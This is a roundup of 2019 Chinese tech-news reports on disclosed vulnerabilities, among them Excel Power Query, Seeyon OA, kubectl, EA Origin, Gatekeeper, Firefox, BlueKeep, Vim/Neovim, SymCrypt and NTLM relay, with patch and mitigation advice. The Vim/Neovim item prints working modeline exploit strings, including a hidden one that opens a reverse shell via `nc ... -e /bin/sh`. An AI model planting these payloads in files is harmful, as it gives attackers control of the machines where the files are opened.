近日，Mimecast 威胁中心的安全研究人员，发现了微软 Excel 电子表格应用程序的一个新漏洞，获致 1.2 亿用户易受网络攻击。其指出，该安全漏洞意味着攻击者可以利用 Excel 的 Power Query 查询工具，在电子表格上启用远程动态数据交换（DDE），并控制有效负载。此外，Power Query 还能够用于将恶意代码嵌入数据源并进行传播。 （图自：Mimecast，via BetaNews） Mimecast 表示，Power Query 提供了成熟而强大的功能，且可用于执行通常难以被检测到的攻击类型。 令人担忧的是，攻击者只需引诱受害者打开一个电子表格，即可发起远程 DDE 攻击，而无需用户执行任何进一步的操作或确认。 对于这项发现，Ofir Shlomo 在一篇博客文章中写到： Power Query 是一款功能强大且可扩展的商业智能（BI）工具，用户可将其与电子表格或其它数据源集成，比如外部数据库、文本文档、其它电子表格或网页等。 链接源时，可以加载数据、并将之保存到电子表格中，或者动态地加载（比如打开文档时）。 Mimecast 威胁中心团队发现，Power Query 还可用于发起复杂的、难以检测的攻击，这些攻击结合了多个方面。 借助 Power Query，攻击者可以将恶意内容嵌入到单独的数据源中，然后在打开时将内容加载到电子表格中，恶意代码可用于删除和执行可能危及用户计算机的恶意软件。 Power Query 提供了如何丰富的控件选项，即便在发送任何有效的负载之前，它也能够用于采集受害者机器或沙箱指纹。 攻击者具有潜在的预有效负载和预开发控制，在向受害者传播恶意负载同时，还能够欺骗文件沙箱或其它安全解决方案，误认为其是无害的。 作为协调漏洞披露（CVD）的一部分，Mimecast 与微软合作，来鉴定操作是否是 Power Query 的预期行为，以及相应的解决方案。 遗憾的是，微软并没有发布针对 Power Query 的漏洞修复程序，而是提供一种解决方案来缓解此问题。   （稿源：cnBeta，封面源自网络。）

昨日（2019年6月26日），互联网上有安全研究者预警并发布了关于致远OA系统的高危安全漏洞，攻击者可以通过某接口漏洞在未授权的情况下实现远程任意代码执行，最终控制整个系统权限。据悉致远OA系统是由用友致远互联旗下协同管理软件系统，在国内很多央企、大型公司都有广泛应用。 知道创宇404实验室立即启动漏洞应急流程，确定该漏洞存在致远OA系统某些型号及版本中某Servlet接口缺少必要的安全过滤，最终允许攻击者远程执行任意代码，并且该接口无需认证即可访问，危害巨大。 通过知道创宇旗下ZoomEye网络空间搜索引擎搜索结果，全球共有29,425个致远OA系统开放记录，中国为29,247个大部分分布在北京、广东、四川等省。 临时方案建议 1. 启用知道创宇旗下云安全防御产品“创宇盾”。 2. 积极联系致远OA系统 http://www.seeyon.com 获取技术支持或联系知道创宇404实验室提供临时解决方案（电话：4001610866）。

根据 TECHERATI 网站报道，Atredis Partners 公司的安全研究人员 Charles Holmes 在 Kubernetes 中发现了一个新的漏洞，如果利用该漏洞，攻击者可以将恶意容器放置到用户工作站上。 该漏洞影响 Kubernetes 的 kubectl 命令行工具，而这个工具是让用户在容器和用户机器之间复制文件。 容器调度器 Kubernetes 在确立为多云部署之后，就大受开发人员的喜爱，根据 JetBrains 的报告，29% 的开发人员现在使用 Kubernetes。所以漏洞的出现会引起很多人关注。 Kubernetes ProductSecurity Committee （Kubernetes 产品安全委员会）的代表人 Joel Smith ，将该漏洞与 CVE-2019-1002101 漏洞联系在一起，CVE-2019-1002101 是在今年3月发现的漏洞，也使攻击者能够通过 kubectl 嵌入恶意容器，而最初解决这个问题并不完整。 Joel Smith 说，攻击者可以将恶意代码嵌入容器的 tar 二进制文件中，这可能允让他们在调用 kubectl 时将文件写入用户计算机上的任何路径，不过，最新的漏洞可以通过将 kubectl 升级到 1.12.9、1.13.6 和 1.14.2 或更高版本来修复。   （稿源：开源中国，封面源自网络。）

据外媒报道，游戏服务出现安全漏洞不是什么新鲜事，日前，来自Check Point Research和CyberInt的研究人员就公开了一个来自EA Origin服务的漏洞。Origin是EA推出的一个类Steam的数字发行平台，由于它是在PC上获得新发行EA游戏的唯一途径，所以它拥有不少的用户，目前已经达到数百万。 Check Point Research和CyberInt在今天的一份报告中指出，这个漏洞可能已经影响到来自世界各地多达3亿的原始用户。该漏洞允许黑客可以无需先盗取登录凭证的情况下就能劫持原始账户。他们可以通过使用废弃的子域名窃取身份验证令牌并利用OAuth单点登录和EA登录系统内置的信任机制来访问这些帐户。 视频来源：https://player.youku.com/embed/XNDI0NDk2OTk3Ng== 今年早些时候，Check Point在《堡垒之夜》中发现了类似漏洞。实际上，这种攻击利用了EA的微软Azure帐户中废弃的子域名，然后以此创建看似合法的网络钓鱼链接。一旦受害者点击了该链接，Check Point和CyberInt就可以得到他们的认证令牌并劫持其账户，而无需登录电子邮件或密码。 不过Check Point和CyberInt在任何怀有恶意的行为者能够利用该漏洞之前就提醒了EA，这使得后者能够利用这两家公司提供的信息关闭这一漏洞。很显然，这对于EA和Origin用户来说是一个好消息。   （稿源：cnBeta，封面源自网络。）

门禁（Gatekeeper）是macOS系统上的一项安全工具，旨在确保只有受信任的软件才能在 Mac 上运行。不过援引外媒报道，这款应用身份认证功能存在安全漏洞，可以用于传播名为“OSX/Linker”的恶意软件安装包。 当您安装来自 App Store 外部的 Mac 应用、插件和安装器软件时，macOS 会检查 Developer ID 签名和公证状态，以验证软件是不是来自获得认可的开发者并且没有遭到改动。通过 macOS Mojave，开发者还可以让 Apple 来公证他们的应用——这表明应用在分发前已经上传到 Apple 并通过了安全检查。 该漏洞由安全专家Filippo Cavallarin首先发现，主要利用了Mac的两项功能：automount和Gatekeeper。正如外媒Tom’s Guide报道，Gatekeeper会将从互联网上下载的文件汇集到苹果XProtect防病毒筛选程序进行审核，但是对于从本地存储设备（通过automount安装）授予文件安全通道，不经过详细审查。Cavallarin能够欺骗Gatekeeper认为下载的文件来自于本地磁盘，从而绕过正常的筛选协议。 Cavallarin表示已经于今年2月份向苹果方面反馈并于5月24日发布了详细信息，但是这个尚未得到修复解决。随附的OSX / Linker恶意软件会试图劫持Mac，从而让计算机从事任何恶意活动，包括加密货币挖掘和数据窃取。 该代码已上传四次到VirusTotal，后者是一个研究人员用于检测和共享恶意软件样本的存储库。目前攻击样本数据并不大，恶意软件已经被Intego软件和可能的其他防病毒工具筛选识别。因此如果用户选择拒绝来自未知来源的下载，相对容易能够避免OSX/Linker恶意软件。   （稿源：cnBeta，封面源自网络。）

Mozilla 发布了 Firefox 67.0.3 和 Firefox ESR 60.7.1 版本，用于紧急修复最新发现的 0day 漏洞。 安全公告中的完整描述如下： 由于 Array.pop 中的问题，操作 JavaScript 对象时可能会出现类型混淆漏洞。这可能导致可利用的崩溃。我们意识到已经有针对性的攻击滥用这个漏洞。 也就是说，该漏洞能够让黑客操纵 JavaScript 代码诱骗用户访问，并将恶意代码部署到他们的 PC 上。 该漏洞由 Google Project Zero 安全研究团队的 Samuel Groß 发现并报告，编号 CVE-2019-11707，安全等级为“严重”。甚至美国网络安全和基础设施安全局也已经参与传播有关补丁的信息。 有报道称可能有黑客利用这个漏洞进行攻击，获取加密货币。但除了 Mozilla 网站上发布的简短描述之外，没有关于此安全漏洞或持续攻击的其他详细信息。 以注重安全和隐私著称的 Firefox 出现 0day 漏洞是非常罕见的，Mozilla 团队最后一次修补 Firefox 0day 还是在 2016 年 12 月。 目前， Mozilla 安全委员会提醒所有 Firefox 用户尽快升级到最新版本，以避免遭受攻击。   （稿源：开源中国，封面源自网络。）

微软一直说服Windows老用户尽快安装补丁，以修复名为“BlueKeep”的严重RDP漏洞。在本月早些时候得到美国国家安全局（NSA）的支持之后，微软再次得到了美国网络安全和基础设施安全局（CISA）的帮助，后者发布了一个“Activity Alert”，提醒和警告用户尽快安装BlueKeep漏洞补丁。 在Alert警告中写道：“CISA鼓励用户和系统管理员审查微软的安全公告，以及关于CVE-2019-0708的微软客户指南，并尽快采取适当的缓解措施。”尽管在CISA的官方警告中并没有明确说明，但援引外媒Engadget报道称CISA正在测试一项“工具”来验证BlueKeep漏洞是否已经被修复。 该漏洞被描述为蠕虫式（wormable），可以利用RDS服务传播恶意程序，方式类似于2017年肆虐的WannaCry勒索软件。目前已经有匿名黑客尝试利用该漏洞执行任意代码，并通过远程桌面协议（RDP）来发送特制请求，在不需要用户交互的情况下即可控制计算机。 目前微软已经发布了适用于Windows 7、Windows Server 2008、Windows XP、Windows Server 2003的补丁。Windows 7和Windows Server 2008用户可以通过启用Network Level Authentication (NLA)来防止未经身份验证的攻击，并且还可以通过阻止TCP端口3389来缓解威胁。 借助 Masscan Internet 等工具，Errata Security 的 Graham 对公网上的 3389 规模进行了大范围扫描，发现漏洞影响将近百万台设备，而黑客有可能在未来一两个月造成严重的破坏。 据悉，受影响的机器包括西门子的一些医疗设备，比如面向放射肿瘤科、实验室诊断、射线成像、医疗点诊断等应用的产品。 为此，西门子建议尽快为潜在受影响的设备打上补丁，并在必要时直接禁用 3389 端口的远程桌面连接（RDP）功能。   （稿源：cnBeta，封面源自网络。）

安全研究人员发现 Vim 与 Neovim 中存在一个任意执行漏洞，允许黑客在用户打开恶意文本文件时控制计算机。漏洞影响 Vim 8.1.1365 与 Neovim 0.3.6 之前的所有版本。 该漏洞存在于编辑器的 modeline（模式行）功能，此功能允许用户在文本文件的开头或结尾设置窗口尺寸和其它自定义选项，它在一个被操作系统封锁的沙箱中运行，并且可用命令也被限制，但是研究人员 Arminius 发现了绕过该安全保护的方法。 目前漏洞已经被编号为 CVE-2019-12735，Arminius 也释出了两个概念验证。 第一个是直接利用该漏洞使系统执行`uname -a`命令： :!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt=" 另一个利用方式更加深入，一旦用户打开文件就自动启动反向 shell。为了隐藏攻击，文件将在打开时立即重写。此外，当使用 cat 输出内容时，攻击还使用终端转义序列隐藏 modeline： \x1b[?7l\x1bSNothing here.\x1b:silent! w | call system(\'nohup nc 127.0.0.1 9999 -e /bin/sh &\') | redraw! | file | silent! # " vim: set fen fdm=expr fde=assert_fails(\'set\\ fde=x\\ \\|\\ source\\!\\ \\%\') fdl=0: \x16\x1b[1G\x16\x1b[KNothing here."\x16\x1b[D \n 目前补丁也已经释出： Vim patch 8.1.1365 Neovim patch (released in v0.3.6) 更具体的细节见： https://github.com/numirias/security/blob/master/doc/2019-06-04_ace-vim-neovim.md.   （稿源：开源中国，封面源自网络。）

安全研究员 Tavis Ormandy‏ 是谷歌 “Project Zero” 团队的一员，负责寻找 0day 漏洞。他公开了一个可利用的 Windows 漏洞，目前，微软仍处于修复过程中。 Tavis Ormandy 发推文说他已经发现了 Windows 核心加密库的安全问题，“微软承诺在 90 天内修复它，结果没有”。于是在第 91 天，Ormandy 选择了公开这个漏洞。 该漏洞实际上是 SymCrypt 中的一个错误，SymCrypt 是负责在 Windows 10 中实现非对称加密算法和在 Windows 8 中实现对称加密算法的核心加密库。Ormandy 发现，通过使用格式错误的数字证书，他可以强迫 SymCrypt 计算进入无限循环。这将有效地对 Windows 服务器执行拒绝服务（DoS）攻击，例如，运行使用 VPN 或 Microsoft Exchange Server 进行电子邮件和日历时所需的 IPsec 协议的服务。 Ormandy 还指出，“许多处理不受信任内容的软件（如防病毒软件）会在不受信任的数据上调用这些例程，这将导致它们陷入僵局。” 不过，他还是将其评为低严重性漏洞，同时补充说，该漏洞可以让人相对轻松地拆除整个 Windows 机群，因此值得注意。 Ormandy 发布的公告提供了漏洞的详细信息，以及可能导致拒绝服务的格式错误的证书示例。 如前所述，Project Zero 有 90 天的披露截止日期。Ormandy 于 3 月 13 日首次报告此漏洞，然后在 3 月 26 日，微软确认将发布安全公告，并在 6 月 11 日的 Patch Tuesday 中对此进行修复。Ormandy 认为，“这是 91 天，但在延长期内，所以它是可以接受的。” 6 月 11 日，微软安全响应中心（MSRC）表示“该修补程序今天不会发布，并且由于测试中发现问题，在 7 月发布之前也不会修补好”，于是 Ormandy 公开了这个漏洞。 公开的漏洞地址：https://bugs.chromium.org/p/project-zero/issues/detail?id=1804 消息来源：Forbes   （稿源：开源中国，封面源自网络。）

近日，外媒报道了微软 NTLM 协议中存在的新漏洞，或导致在任何 Windows 计算机上执行远程代码、或对任何支持 Windows 集成身份验证（WIA）的 Web 服务器（如 Exchange 和 ADFS）进行身份验证。具体说来是，Perrmpt 研究小组发现了由三个逻辑缺陷组成的两个严重漏洞，且所有 Windows 版本都易受到攻击影响。更糟糕的是，新漏洞可绕过微软此前已部署的缓解措施。 NTLM 中继流程示意（来自：HelpNetSecurity，via MSPU） 据悉，NTLM Relay 是 Active Directory 环境中最常用的攻击技术之一。虽然微软此前已经开发了几种缓解 NTLM 中继攻击的缓解措施，但 Preempt 研究人员发现其仍然存在隐患： ● 消息完整性代码（MIC）字段可确保攻击者不会篡改 NTLM 消息，但研究人员发现的旁路攻击，可以卸下 MIC 的保护，并修改 NTLM 身份验证流程中的各个字段，如签名协商。 ● SMB 会话签名可防止攻击者转发 NTLM 身份验证消息以建立 SMB 和 DCE / RPC 会话，但旁路攻击仍能将 NTLM 身份验证请求中继到域中的任何服务器（包括域控制器），同时建立签名会话以执行远程代码。如果中继身份验证属于特权用户，则会对全域造成损害。 ● 增强型身份验证保护（EPA）可防止攻击者将 NTLM 消息转发到 TLS 会话，但攻击者仍可绕过并修改 NTLM 消息，以生成合法的通道绑定信息。这使得攻击者可利用用户权限连接到各种 Web 服务，并执行读取用户电子邮件（通过中继到 OWA 服务器）、甚至连接到云资源（通过中继到 ADFS 服务器）等各种操作。 Preempt 负责地向微软公司披露了上述漏洞，后者在周二的时候发布了 CVE-2019-1040 和 CVE-2019-1019 补丁来应对这些问题。 然而 Preempt 警告称，这么做还不足以充分应对 NTLM Relay 带来的安全隐患，因为管理员还需要对某些配置加以更改，才能确保有效的防护。 下面是管理员的建议操作： （1）执行修补程序 – 确保为工作站和服务器打上了所需的补丁。 （2）强制 SMB 签名，放置攻击者发起更简单的 NTLM 中继攻击，请务必在网络中的所有计算机上启用 SMB 签名。 （3）屏蔽 NTLMv1 – 该版本相当不安全，建议通过适当的组策略来完全封禁。 （4）强制执行 LDAP / S 签名 – 要防止 LDAP 中的 NTLM 中继，请在域控制器上强制执行 LDAP 签名和 LDAPS 通道绑定。 （5）实施 EPA – 为防止 Web 服务器上的 NTLM 中继，请强化所有 Web 服务器（OWA / ADFS），仅接受使用 EPA 的请求。 （6）减少 NTLM 的使用 – 因为即便采用了完整的安全配置，NTLM 也会比 Kerberos 带来更大的安全隐患，建议在不必要的环境中彻底弃用。   （稿源：cnBeta，封面源自网络。）